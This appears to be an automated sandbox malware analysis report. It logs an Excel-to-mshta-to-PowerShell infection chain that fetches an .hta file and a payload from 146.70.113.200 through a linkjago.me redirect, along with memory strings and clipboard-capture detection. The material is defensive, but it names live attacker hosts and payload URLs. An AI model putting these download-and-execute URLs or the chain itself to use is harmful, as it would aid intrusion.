Source: global traffic	HTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.113.200

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_000007FE899D7018 URLDownloadToFileW,

8_2_000007FE899D7018

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F2129E.emf

Creates a window with clipboard capturing capabilities

Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
Source: global traffic	HTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive

Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: linkjago.me
Source: global traffic	DNS traffic detected: DNS query: 1016.filemail.com

Source: mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/
Source: mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200//
Source: mshta.exe, 0000000F.00000003.477431887.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
Source: mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta$
Source: mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...
Source: mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...893F-F
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta24
Source: mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC
Source: mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC:
Source: mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaJ
Source: mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaX
Source: mshta.exe, 00000004.00000002.428991185.0000000000215000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaes
Source: mshta.exe, 00000004.00000003.422140818.0000000000246000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.0000000000234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlig
Source: mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghligM
Source: mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlight=delicious&middleman=magenta&span
Source: mshta.exe, 00000004.00000002.428991185.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423819561.000000000027A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl
Source: mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl0
Source: mshta.exe, 00000004.00000003.424465133.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477594766.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htahttp://146.70.113.200/231/dnv/seemebestt
Source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethe
Source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.490184350.000000001ABAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF
Source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFp
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.450756599.000000001A782000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000013.00000002.490602752.000000001C251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.cr
Source: powershell.exe, 00000008.00000002.448366945.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 